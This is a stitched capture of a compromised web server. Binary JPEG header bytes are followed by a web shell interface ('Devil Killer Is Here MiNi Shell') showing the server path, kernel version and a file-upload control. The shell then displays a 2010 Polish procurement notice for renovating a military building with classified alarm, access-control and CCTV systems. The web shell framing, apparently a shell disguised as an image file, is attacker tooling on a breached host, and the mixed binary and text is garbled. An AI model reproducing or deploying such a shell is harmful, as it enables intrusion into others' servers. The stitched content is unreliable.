JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100915/293274-N-2010.html

<p class="kh_header"><b>Wrocław: REMONT BUD. NR 7 WROCŁAW STARACHOWICE NA POTRZEBY SEKTORA ZABEZPIECZENIA  TELEINFORMATYCZNEGO.

Postępowanie w zakresie wykonania systemów alarmowych SSWiN i KD wiąże się z dostępem do informacji niejawnych stanowiących tajemnicę służbową o klauzuli  ZASTRZEŻONE</b><br>
<b>Numer ogłoszenia: 293274 - 2010; data zamieszczenia: 15.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Rejonowy Zarząd Infrastruktury , ul. Obornicka 126, 50-984 Wrocław, woj. dolnośląskie, tel. 071 765 68 42, faks 071 765 68 44, 765-68-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rzi.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT BUD. NR 7 WROCŁAW STARACHOWICE NA POTRZEBY SEKTORA ZABEZPIECZENIA  TELEINFORMATYCZNEGO.

Postępowanie w zakresie wykonania systemów alarmowych SSWiN i KD wiąże się z dostępem do informacji niejawnych stanowiących tajemnicę służbową o klauzuli  ZASTRZEŻONE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2.1. Część ogólna obejmuje:

2.1.1. Organizacja terenu budowy.

Teren budowy zorganizować i wyposażyć, na czas prowadzenia robót budowlanych w następujące kontenery: biuro kierownika budowy, niezbędną ilość kontenerów socjalnych dla pracowników, WC typu TOI-TOI oraz magazynowe a ponadto wygrodzić teren budowy z elementów  trwałych - staraniem i na koszt Wykonawcy robót. 
Zaplecze budowy zorganizować w miejscu wskazanym przy przekazaniu terenu budowy z udziałem przedstawicieli Zamawiającego i Wojskowego Oddziału Gospodarczego Nr 2 we Wrocławiu. 
Zaplecze powyższe  należy zorganizować w terminie do 14 dni licząc od daty przekazania terenu budowy.

2.1.2. Demontaż, utylizacja, odzysk.

Zdemontowane elementy takie jak skrzydła okienne i drzwiowe wraz 
z ościeżnicami, opierzenia, rury spustowe, rynny i inne materiały należy przekazać do magazynów Wojskowej Administracji Koszar we Wrocławiu - Strachowicach. Gruz ceglany i betonowy wywieźć na wysypisko śmieci. 
Zgodnie z zarządzeniem nr 1088/2003 Prezydenta Wrocławia z dnia 22 lipca 2003r. materiały takie jak gruz ceglany, betonowy odpady szkła, skrzydła okienne i drzwiowe wraz z ościeżnicami z wyjątkiem materiałów zawierających szkodliwe substancje należy wywozić na wysypisko przy ul. Jerzmanowskiej 8c we Wrocławiu lub na inne pozostające w dyspozycji Gminy Wrocław i świadczące usługi polegające na przetwarzaniu odpadów z budowy. Wg obowiązujących przepisów Wykonawca winien składać informacje w Wydziale Środowiska i Rolnictwa o wytwarzanych odpadach i sposobie ich zagospodarowania oraz wskazuje miejsce i sposób magazynowania.
Koszty składowania gruzu, skrzydeł okiennych i drzwiowych wraz z ościeżnicami, utylizacji papy rozbiórkowej, obsługi geodezyjnej oraz pomiarów powykonawczych, wykonanie opinii kominiarskich i innych usług 
(nie wymienionych w przedmiarach) przewidywać do rozliczenia w kosztach pośrednich.

3. ZAKRES ROBÓT.
 
3.1. W zakresie robót ogólnobudowlanych:
a. roboty demontażowe (demontaż stolarki okiennej i drzwiowej , okładzin ścian , rozbiórki posadzek, skucie tynków itp.),
b. rozbiórka pokrycia dachu, a następnie częściowo drewnianej konstrukcji dachu,
c. wymiana części drewnianej konstrukcji dachu,
d. wykonanie ocieplenia stropu nad poddaszem,
e. wykonanie wszystkich instalacji w budynku,
f. wykonanie drenażu opaskowego,
g. wykonanie zewnętrznej izolacji przeciwwodnej oraz termicznej ścian fundamentowych,
h. wykonanie ocieplenia ścian zewnętrznych budynku styropianem,
i. wykonanie oblicowania elewacji płytkami elewacyjnymi z klinkieru,
j. oblicowanie cokołu z piaskowca,
k. wykonanie wewnętrznej hydroizolacji ścian fundamentowych wewnętrznych 
i zewnętrznych,
l. wykonanie izolacji przeciwwodnej oraz termicznej posadzek w piwnicach,
m. wykonanie wentylacji grawitacyjnej,
n. całkowita wymiana stolarki okiennej, parapetów zewnętrznych i wewnętrznych oraz wymiana stolarki drzwiowej,
o. częściowa przebudowa ścian działowych,
p. zainstalowanie krat zewnętrznych w niektórych oknach,
q. wymiana rynien i rur spustowych oraz obróbek blacharskich,
r. wykonanie wentylacji oraz w części mechanicznej,
s. wykonanie wewnątrz budynku prac adaptacyjnych polegających na wykonaniu nowych otworów drzwiowych i ścian działowych oraz zamurowanie istniejących w związku z przystosowaniem budynku do nowej funkcji,
t. nad projektowanymi otworami w ścianach działowych i konstrukcyjnych wykonać nadproża z belek stalowych walcowanych wg opisu na rzutach poszczególnych kondygnacji projektu wykonawczego ,
u. wymiana tynków wewnętrznych,
v. wymiana i remont podłóg,

3.2. W zakresie  instalacji elektrycznych- (CPV45310000-3):

3.2.1. Zewnętrzne zasilanie kablowe (CPV45310000-3).
Do zasilania budynku wykorzystać istniejącą linię kablową która jest zakończona złączem kablowym zabudowanym na elewacji budynku(do przesunięcia w czasie robót elewacyjnych).
Dla przyłączenia linii  zasilającej budynku nr 7 zdemontować istniejące złącze kablowe a wykonać nowe złącze kablowe ZK-3a z którego poprowadzić kabel zasilający do rozdzielni RG. Rozdzielnię główną  wyposażyć w przeciwpożarowy wyłącznikiem głównym zasilania  z wyzwalaczem wzrostowym, które wykonać  jako moduł zespolony, zabudowując je zgodnie z projektem oraz wyposażyć w układ pomiarowy. Lokalizację przycisku umożliwiającego wyłączenie energii na wypadek pożaru uzgodnić z  przedstawicielem Delegatury Wojskowej Ochrony Przeciwpożarowej we Wrocławiu. Z rozdzielni głównych poprowadzić WLZ zasilające rozdzielnie oddziałowe. Dla zasilania rezerwowego rozdzielni głównej wykonać przyłącze agregatu prądotwórczego zgodnie ze wskazaniami w opracowaniu projektowym. 

3.2.2. Rozdzielnie  oddziałowe i podrozdzielnie (CPV45311000-1).
Dla zasilania poszczególnych  części budynku  wykonać tablice rozdzielcze oddziałowe,  z których należy wyprowadzić  obwody do zasilania poszczególnych elementów urządzeń instalacji elektrycznej zgodnie z projektem. 

3.2.3. Instalacja oświetleniowa  podstawowego awaryjnego i ewakuacyjnego
           (CPV45311000-0).
Wykonać oświetlenie dla wszystkich pomieszczeń budynku, dla potrzeb oświetlenia w pomieszczeniach  zainstalować  oprawy ze źródłami światła jarzeniowymi, tak aby  natężeniu oświetlenia było zgodne z polską normą i założeniami projektowymi dla poszczególnych pomieszczeń. Na ciągach komunikacyjnych i pomieszczeniach budynku  zainstalować część lamp wyposażonych w moduł awaryjny o czasie działania 3 h.  Dla całego budynku wykonać instalację oświetlenia ewakuacyjnego z piktogramami wskazującymi kierunki wyjścia.

3.2.4. Instalacja gniazd jednofazowych trójfazowych  230/400V (CPV45311000-1) 

Do wszystkich pomieszczeń budynku wykonać instalację zasilającą gniazda 230V z wydzielonymi obwodami dla zasilania gniazd ogólnych i gniazd sieci dedykowanej - komputerowej. Dla zasilania sieci gwarantowanej - dedykowanej zainstalować zasilacz awaryjny UPS.  

3.2.5. Instalacja obwodów siłowa  400/230V (CPV45311000-1).
Dla zasilania odbiorników siłowych, trójfazowych i jednofazowych należy wykonać wydzielone  obwody do  zasilania urządzeń technologicznych, wentylacji klimatyzacji, których lokalizacje uzgodnić na etapie realizacji z wykonawcą robót sanitarnych  i klimatyzacji. 

3.2.6. Instalacja uziemień roboczych i połączeń wyrównawczych.
Dla  budynku wykonać instalację uziemień  roboczych i połączeń wyrównawczych, którą  połączyć z  uziomem  otokowym poprzez złącze kontrolne. Z szyną wyrównawczą połączyć wszystkie elementy konstrukcji metalowych, rurociągi wodne, koryta kablowe, kanały wentylacyjne i inne urządzenia o konstrukcji metalowej. Dla pomieszczeń w których będą  zainstalowane urządzenia łączności wykonać uziemienie bezpieczeństwa emisji. Całość instalacji uziemień  roboczych i połączeń wyrównawczych dla budynku wykonać zgodnie z projektem.
3.2.7. Instalacja odgromowa (CPV45317000-2)
Na dachu ułożyć zwody poziome, do których należy podłączyć zwody pionowe. Zwody pionowe należy poprowadzić pod ociepleniem elewacyjnym w rurkach PCV, które połączyć z przewodami uziemiającymi za pośrednictwem złącz kontrolnych umieszczonych w skrzynkach GALMARA montowanych na elewacji budynku na wysokości 0,8 m. Do uziemienia instalacji odgromowej wykorzystać istniejący uziom otokowy wraz  z przewodami uziemiającymi. Z instalacją odgromową połączyć wszystkie metalowe elementy konstrukcyjne umieszczone na dachu budynku. Na ewentualnym skrzyżowaniu uziomu z kablami energetycznymi, uziom ułożyć w rurach.

3.2.8. Ochrona przed  przepięciami. 
W celu ochrony przed skutkami bezpośrednich wyładowań atmosferycznych wykonać instalację przeciw przepięciową. Dla przepięć wtórnych i odprowadzenia dużych prądów piorunowych zainstalować ochronniki przepięciowe wielostopniowe 
w poszczególnych rozdzielniach zgodnie z projektem.


3.2.9. Ochrona dodatkowa od porażeń.
Dla ochrony przeciwporażeniowej przed porażeniem prądem elektrycznym zastosować samoczynne szybkie wyłączanie zasilania poprzez zastosowanie wyłączników nadmiarowo i różnicowoprądowych. Ochronie podlegać mają  wszystkie gniazda zasilające do których będą przyłączane urządzenia posiadające metalowe obudowy i korpusy urządzeń elektrycznych mogące znaleźć się pod napięciem.
3.2.10. Pomiary powykonawcze

- Pomiary rezystancji izolacji kabli i przewodów, 
- Pomiary  skuteczności ochrony przeciwporażeniowej,
- Pomiary skuteczności samoczynnego szybkiego wyłączania zasilania, wyłączników różnicowoprądowych, 
- Pomiary uziemień roboczych i ochronnych,
- Pomiary instalacji połączeń wyrównawczych,
- Pomiary instalacji odgromowej,
- Pomiary natężenia oświetlenia,
- Sprawdzenie działania przeciw pożarowego wyłącznika prądu,
Protokoły z wykonanych  pomiarów winny być załączone do dokumentacji powykonawczej 

3.3. Instalacje teletechniczne.  
3.3.1.Instalacja okablowania strukturalnego (telefoniczna i komputerowa)    (CPV45314320-0).
Dla pomieszczeń kancelaryjnych, biurowych i szkoleniowych na poszczególnych kondygnacjach wykonać  instalację sieci logicznej strukturalnej kat.6e z podziałem na sieć jawną i niejawną. Lokalizację głównego punktu i pośrednich punktów dystrybucyjnych przyjąć zgodnie z projektem. Wyposażyć punkty dystrybucyjne w urządzenia aktywne dla sieci ogólnej oraz sieci niejawnej MIL - LAN i dla podłączenia do wojskowej sieci teleinformatycznej  MIL- WAN. SEK - WAN.
     Do odbioru  sieci okablowania  strukturalnej będą wymagane:
- protokóły z pomiarów  parametrów transmisyjnych  dla określonej  kategorii.

3.3.2. Instalacja orurowania pod sieć łączności niejawnej (CPV45314320-0).

W  pomieszczeniach kancelaryjnych, biurowych, wskazanych w projekcie wykonać (orurowanie) dla instalacji abonenckiej podsystemu cyfrowej łączności utajnionej PCŁU STORCZYK . Szczegóły lokalizacji punktów odbiorczych uzgodnić na etapie realizacji z użytkownikiem.
      
3.3.3. System Sygnalizacji Włamania i Napadu (SSWiN) i kontroli dostępu (KD)  
          wg dokumentacji o   klauzuli ZASTRZEŻONE.
     W budynku  wykonać System Sygnalizacji Włamania i Napadu i kontroli dostępu klasy   SA-4 z urządzeniami klasy S. dla pomieszczeń kancelaryjnych.  Dla systemu wykonać awaryjne źródło zasilania, które zapewni normalną pracę w stanie dozorowania i w stanie alarmu przy spełnieniu odpowiednich warunków dotyczących dozoru ludzkiego i świadczenia usług serwisowych.        
Instalację systemu alarmowego należy wykonać w rurkach ochronnych pod tynkiem. Wykonany system połączyć dwutorowo z dyżurką Oficera Dyżurnego  
i z wartownią służb ochrony jednostki. Szczegóły dotyczące programowania systemu alarmowego w zakresie podziału na strefy poziomu dostępności do systemu 
i stosowania  podwójnego kodu oraz monitorowania zaistniałych zdarzeń alarmowych uzgodnić z pełnomocnikami jednostki wojskowej 2644 i 3030.
Do odbioru  systemów SSWiN i KD będą wymagane : 
- instrukcje fabryczne urządzeń ,
- zaświadczenia kwalifikacyjne urządzeń, 
- notatki w zakresie uzgodnień realizacyjnych z inwestorem,
- protokoły odbioru częściowego i końcowego,
- protokoły szkolenia obsługi poszczególnych instalacji,
- karty gwarancyjne poszczególnych instalacji,
- instrukcja dla użytkownika głównego, (administratora)
- instrukcja dla pozostałych użytkowników,
- instrukcja wykonania przeglądów  konserwacyjnych,
- deklaracja zgodności systemu z klasą
- wykaz osób zatrudnionych przy wykonaniu poszczególnych instalacji,
- książki przeglądu, napraw i konserwacji poszczególnych instalacji.

3.3.4. Instalacja sygnalizacji alarmowej pożaru (SAP) (CPV45312100-8).
         Dla wydzielonych pomieszczeń kancelaryjnych, oraz pomieszczeniach przyległych wykonać instalację sygnalizacji alarmowej pożaru, którą należy wykonać w rurkach ochronnych pod tynkiem. System sygnalizacji alarmowej wykonać jako odrębny i niezależny od innych instalacji.  Wykonać dwa niezależne tory transmisji alarmu (n p.  kablowy i radiowy), które  połączyć z dyżurką Oficera Dyżurnego i służbami ochrony jednostki celem monitorowania zaistniałych zdarzeń alarmowych. 

3.3.5 System telewizji przemysłowej (CCTV).

	Wykonać system telewizji dozorowej w celu prowadzenia ciągłego nadzoru obserwacji zewnętrznej drzwi wejściowych i okien kancelarii tajnej oraz innych pomieszczeń w strefie I. Rozmieszczenie kamer i  ich ustawienie  należy wykonać   w taki sposób aby maksymalnie wykorzystać ich pole widzenia. 
	Stanowisko dozoru wizyjnego realizować w pomieszczeniu kancelaryjnym  (I piętro przebudowywanego budynku pomieszczenie 130) z podglądem ze wszystkich zainstalowanych kamer.
	Dla zainstalowanego systemu zapewnić zasilanie gwarantowane, które umożliwi ciągłą pracę systemu w czasie nie krótszym niż 4 h. Instalację należy wykonać w rurkach ochronnych pod tynkiem.
          
UWAGA:
Zgodnie z instrukcją OIN 3/2008 O OCHRONIE OBIEKTÓW WOJSKOWYCH załącznik nr 6 pkt. 1 i 3 a dotyczące wymagania które muszą być spełnione przez przedsiębiorców  (firmy)  ubiegających się o realizację przedsięwzięć ochronnych w obiektach wojskowych, systemów i urządzeń alarmowych instalowanych w tych obiektach, oraz tryb postępowania przed ogłoszeniem przetargu i inne ustalenia.

Firma ochrony technicznej ubiegająca się o realizację przedsięwzięć ochronnych w obiektach wojskowych, których realizacja przedsięwzięć wiąże się z dostępem do informacji stanowiących tajemnicę służbową - powinna posiadać:

a) ważną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych 
i Administracji na prowadzenie działalności w zakresie ochrony osób i mienia;
b) stosowne licencje pracowników ochrony technicznej lub fizycznej dla wszystkich osoby przewidziane do realizacji przedsięwzięć ochronnych 
w obiektach wojskowych;
c) poświadczenia bezpieczeństwa dla instalatorów  systemów alarmowych oraz innych osób przewidzianych do realizacji przedsięwzięć ochronnych w obiektach wojskowych wydane przez pełnomocnika ochrony jednostki organizacyjnej (firmy);
d) pełnomocnika ochrony przeszkolonego w zakresie ochrony informacji niejawnych przez Służby Kontrwywiadu Wojskowego lub Urząd Ochrony Państwa;
e) instalatorzy systemów alarmowych powinni posiadać świadectwa odbycia szkolenia i autoryzacji w zakresie instalowania  ujętych w ofercie systemów   klasy SA-4 (dotyczy firm ochrony technicznej);
f) certyfikaty lub świadectwa kwalifikacyjne na urządzenia alarmowe przewidziane do instalacji w obiektach wojskowych.

3.4. W zakresie instalacji sanitarnych (CPV 45331100-7, 45331220-4).

3.4.1 Przyłącze wody. 
Do obiektu wykonać nowe przyłącze wodociągowe z rur i kształtek ciśnieniowych typu PEHD do wody pitnej o średnicy 75 mm. Przyłącze wykonać 
z istniejącego wodociągu 150 mm, przebiegającego w sąsiedztwie obiektu. 
Na włączeniu do istniejącego wodociągu wykonać zasuwę odcinającą O75 mm 
z obudową i trzpieniem teleskopowym przedłużonym do skrzynki ulicznej. W miejscu włączenia wykonać blok oporowy. Po wejściu do obiektu przyłącze zakończyć montażem zespołu wodomierzowego oraz zaworem antyskażeniowy, montowanym od strony instalacji wewnętrznej. Wykonać stosowne płukanie 
i dezynfekcję przyłącza oraz wymagane próby szczelności. 

3.4.2. Przyłącze kanalizacji sanitarnej .
	Z obiektu wykonać dwa wyjścia kanalizacji sanitarnej, połączone w przykanalik zrzutowy O20 mm, włączony do istniejącego układu zewnętrznej kanalizacji sanitarnej - studzienka istniejąca O1200 mm (s1=120,10/116,20). Na wejściach zrzutów sanitarnych z obiektu wykonać studzienki kontrolno-rewizyjne. PCV 
O425 mm . Na zmianie kierunku przykanalik zrzutowego wykonać studzienkę żelbetową O 1200 mm . ciągi kanalizacji sanitarnej wykonać z rur PCV klasy S łączonych na uszczelkę gumową.

3.4.3. Przyłącze deszczowe.
	Wokół obiektu wykonać ciągi kanalizacji deszczowej, sprowadzające wody opadowe z rur deszczowych. Obwód deszczowy włączyć do istniejącej w kompleksie instalacji odprowadzenia wód deszczowych w istniejącej studzience. Rury deszczowe łączyć do obwodu deszczowego poprzez trójniki oraz studzienki PCV O 425 mm, zgodnie z projektem wykonawczym przyłączy kanalizacyjnych. Przed zasypaniem ciągów kanalizacyjnych wykonać stosowne próby szczelności ciągów instalacyjnych i studzienek. 

3.4.4. Drenaż opaskowy
	Dla zabezpieczenia przed możliwością penetracji wód gruntowych wykonać opaskę drenażową O100 mm z włączeniem do przyłącza kanalizacji deszczowej O200 mm.

3.4.5. Instalacja  centralnego ogrzewania.

        W obiekcie wykonać nową instalację centralnego ogrzewania w systemie wodnym dwururowym z rozdziałem dolnym. Instalację rozpoczynają rozdzielacze umieszczone w węźle cieplnym (węzeł cieplny będzie wykonany wg odrębnego opracowania przez innego Wykonawcę wyłonionego przez służby miejskie Wrocławia). Instalacje wykonać z rur stalowych czarnych, łączonych przez spawanie. Zasilający główny przewód poziomy prowadzić pod stropem piwnic, 
a zbiorczy przewód powrotny na poziomie posadzki w piwnicy. Rozprowadzenie rozwinąć w piony zasilające powierzchnie grzewcze na wszystkich kondygnacjach. Na odgałęzieniach rozprowadzenia w węźle zamontować zawory regulacyjno - odcinające MSV-B LENO firmy Danfoss lub zamienne równoważne.
Na odgałęzieniach zasilania pionów montować zawory regulacyjno - odcinające. Jako powierzchnie grzewcze zastosować grzejniki stalowe, płytowe typu RADSON lub zamienne równoważne z zasilaniem bocznym, wyposażone w zawory termostatyczne podwójnej regulacji z głowicami termostatycznymi.  Na zaworach grzejnikowych dokonać nastaw wstępnych, zgodnych z obliczeniami projektu.
	Na przebiegach rurowych instalacji centralnego ogrzewania, zarówno na zasilaniu jak i na powrocie,  w pomieszczeniach montować separatory oddzielające przy wejściach i wyjściach do pomieszczeń związanych z wytwarzaniem i obiegiem informacji niejawnych. 
	Na najwyższym punkcie pionów zasilających montować odpowietrzenia. 
Po ukończeniu montażu instalacje przepłukać i poddać próbie szczelności. Rurociągi poziome i pionowe prowadzone pod stropem i w szachtach instalacyjnych izolować na całej długości otuliną piankową grubości 40 mm.

 3.4.6. Instalacja wod.kan., hydranty ppoż. i c.w.u.
	Dla obiektu wykonać wewnętrzną instalację wodociągową oraz piony instalacji ppoż. z rur stalowych ocynkowanych. Od zaworu antyskażeniowego poprowadzić wewnętrzną instalację do poszczególnych przyborów stanowiących wyposażenie sanitarne obiektu oraz rozwinąć w dwa piony hydrantowe. Zmontowaną instalację zdezynfekować i przepłukać oraz wykonać ciśnieniową próbę szczelności. 
Na zaworach hydrantowych sprawdzić wielkość dynamicznego ciśnienia.
	Sieć ciepłej wody użytkowej wykonać w pełnej analogii do instalacji wody zimnej. Przewody ciepłej wody izolować termicznie na całej długości przebiegu. Instalacje ciepłej wody użytkowej z obiegiem cyrkulacyjnym powiązać z zasilaniem 
w węźle cieplnym. Dla instalacji wykonać sprawdzającą próbę szczelności.
	Ścieki sanitarne z przyborów zainstalowanych w obiekcie odprowadzić poprzez wykonane sieci podejść i pionów odpływowych. Wszystkie piony przed wejściem w posadzkę piwnicy wyposażyć w rewizję - czyszczenie. Wykonać bezpośrednie (rura wywiewna) lub pośrednie napowietrzanie każdego z pionów.

3.4.7. Wentylacja i klimatyzacja.
	W budynku wykonać instalację mechanicznej wentylacji wywiewnej pomieszczeniach sanitarnych oraz w pomieszczeniu palarni. Wywiew powietrza 
w układach pionów wentylacyjnych W1, W2 i W3 realizować przez montaż wentylatorów dachowych.
Linia nr W1 - wentylator typu DAs 315 prod. UNIWERSAL, wydajność Q=1380 m3/h
                       (sanitariaty) lub równoważny, zamienny,
Linia nr W2 - wentylator typu DAs 160 prod. UNIWERSAL, wydajność Q=100 m3/h 
                       (sanitariaty) - lub równoważny zamienny,
Linia nr W3 - wentylator typu DAs 250 prod. UNIWERSAL, wydajność Q=330 m3/h
                       (palarnia) - lub równoważny zamienny.
Kanały okrągłe wykonać z blachy stalowej ocynkowanej typu SPIRO. Do mocowania kanałów stosować typowe zawieszenia wraz z konstrukcją wsporczą. Dla każdego 
z układów przewidzieć otwory rewizyjne w kanałach wentylacyjnych. Przy przejściu kanałów wentylacyjnych przez strop rozdzielenia przeciwpożarowego (strop pomiędzy piwnicą a parterem), należy je wyposażyć w klapy ppoż. Na przygotowanych cokołach pod wentylatory dachowe montować tłumiące podstawy dachowe dla ochrony akustycznej. Montaż instalacji wentylacji zakończyć regulacją aerodynamiczną celem uzyskania przepływów zgodnych z warunkami obliczeniowymi.
	W celu zwiększenia komfortu pracy w niektórych pomieszczeniach biurowych oraz w pomieszczeniu serwerowni montować miejscowe klimatyzatory. Zaprojektowane jednostki wewnętrzne naścienne połączyć z jednostkami zewnętrznymi umieszczonymi na elewacji budynku. Dodatkowo urządzenia należy wyposażyć w urządzenia umożliwiające pracę klimatyzatorów w trybie chłodzenia 
w okresie letnim..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.62.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium w wysokości - 226 247,00 zł.
Wadium wnoszone w pieniądzu musi znaleźć się na koncie Zamawiającego  do dnia   30.09.2010r.  do godz. 10.00.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>aktualną koncesję wydaną przez Ministerstwo Spraw Wewnętrznych  i Administracji na prowadzenie działalności w zakresie usług ochrony osób  i mienia, realizowanych w formie zabezpieczenia technicznego,</p>
